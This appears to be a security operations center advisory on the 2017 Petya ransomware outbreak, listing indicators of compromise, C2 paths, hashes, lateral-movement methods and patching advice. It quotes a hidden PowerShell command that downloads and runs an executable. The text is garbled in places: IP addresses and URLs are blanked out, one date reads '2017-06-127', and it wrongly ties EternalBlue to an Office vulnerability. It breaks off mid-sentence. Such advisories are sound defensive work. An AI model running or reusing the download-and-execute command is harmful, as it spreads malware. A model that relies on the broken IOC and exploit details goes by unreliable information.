Current evidence shows that these attacks began with malicious spam emails weaponized to use the EternalBlue exploit for Microsoft Office vulnerability CVE-2017-0199 over TCP ports 445, 135, and potentially 1024-1035.

Malicious emails originate from IPs,,, which the attackers have registered to the domains delightcaf[.]xyz, french-cooking[.]com and coffeeinoffice[.]xyz.

The mal-spam variant of this attack is predominantly coming from[.]xls and[.]xls. All traffic to the Command and Control (C2) servers is currently using HTTP as the communication protocol.

Early reports indicate the botnet distributing this malware originates from the LokiBot network. Also, additional reports state the Mischa ransomware package is included in the Petya PE, however confirmation is still forthcoming.

Latest Indicators of Compromise

2017-06-127 15:20 EDT

File Names

These files are all accessed using the runtime process WINWORD.EXE (PID3008)

  • %APPDATA%\Microsoft\Office\Recent\Order-20062017.LNK
  • %APPDATA%\Microsoft\Office\Recent\index.dat
  • %APPDATA%\Microsoft\Templates\~$Normal.dotm
  • C:\~$der-20062017.doc@Please_Read_me@.txt
  • %LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7N5LGTOO\myguy[1].hta
  • %LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1E328F26-90AD-432F-85D6-72D24D3FC842}.tmp
  • %LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8C06767A-F061-47F9-B88B-16AA8AA0D1F2}.tmp

Command and Control (C2)

  • 200.16.242/myguy[.]xls
  • 165.29.78/myguy[.]xls

Memory Strings

  • !”#$%&'()*+,-./0123456789:;<=>
  • “$(*.046:<“j.x\
  • (\{9%EZ”B%]V\XR){y%JWbj3jiDN}~Hl:x7
  • )|xA:X+Zp@w>v)7#% M+ANqR#mXf,934 qx$}&
  • /myguy.xls
  • /n “C:\Order-20062017.doc”
  • 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000}}
  • 0000320a5802580201000400000000005202bc0220003600050000000902000000021c000000fb021000070000000000bc02000000000102022253797374656d0076f8032f0040311500bf05087640910b76fc7cb3044c311500040000002d010500040000002d01050004000000f0010300030000000000}{\result {
  • 1Pm\\9M2aD];Yt\[x]}Wr|]g-
  • 6iD_,|uZ^ty;!Y,}{C/h> PK ! dQ 1 word/_rels/document.xml.rels ( j0{-;@ $~

File Hash Values

    • A809a63bc5e31670ff117d838522dc433f74bee
    • 078de2dc59ce59f503c63bd61f1ef8353dc7cf5f
    • bec678164cedea578a7aff4589018fa41551c27f
    • d5bf3f100e7dbcc434d7c58ebf64052329a60fc2
    • aba7aa41057c8a6b184ba5776c20f7e8fc97c657
    • 0ff07caedad54c9b65e5873ac2d81b3126754aac
    • 51eafbb626103765d3aedfd098b94d0e77de1196
    • 7ca37b86f4acc702f108449c391dd2485b5ca18c
    • 2bc182f04b935c7e358ed9c9e6df09ae6af47168
    • 1b83c00143a1bb2bf16b46c01f36d53fb66f82b5
    • 82920a2ad0138a2a8efc744ae5849c6dde6b435d

Binary Details

The binary is currently signed using a certificate from Sysinternals. This will give a Certificate Name Mismatch error; however, the binary will still run in Windows. The current samples attempt to hijack an authorized session in order to spread using psexec. Several of the samples show the lateral movement functions are utilizing Windows Management Instrumentation Command-line (WMIC). Both are avenues for the malware to gain either local or Domain Administrator privileges allowing it to spread using that level of credential.

The sample was compiled for the i386 architecture specifically but appears to be functional on x64 architecture as well.

The PE imports the following DLL files for proper execution:

  • ADVAPI32.dll
  • CRYPT32.dll
  • KERNEL32.dll
  • MPR.dll
  • NETAPI32.dll
  • SHELL32.dll
  • SHLWAPI.dll
  • USER32.dll
  • WS2_32.dll
  • msvcrt.dll
  • ole32.dll


The PE will attempt to execute the following script:

PowerShell -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘’, ‘%APPDATA%\<random>.exe’)

The <random> variable is a random number between 0-65535, which it will then call with the arguments 1  0 (For example %APPDATA%\10254.exe 1 0).

Additional files dropped:

  • http[:]//

Extortioner Contact Info:


vSOC recommends immediately patching the vulnerabilities described in CVE-2017-0199  and MS17-010. However, unlike the previous WCrypt0r ransomware, patching alone will not prevent the spread of this malware. Petya’s code will attempt to use a variety of methods to propagate itself including the EternalBlue vulnerability, WMIC, and Powershell.

vSOC recommends that organizations: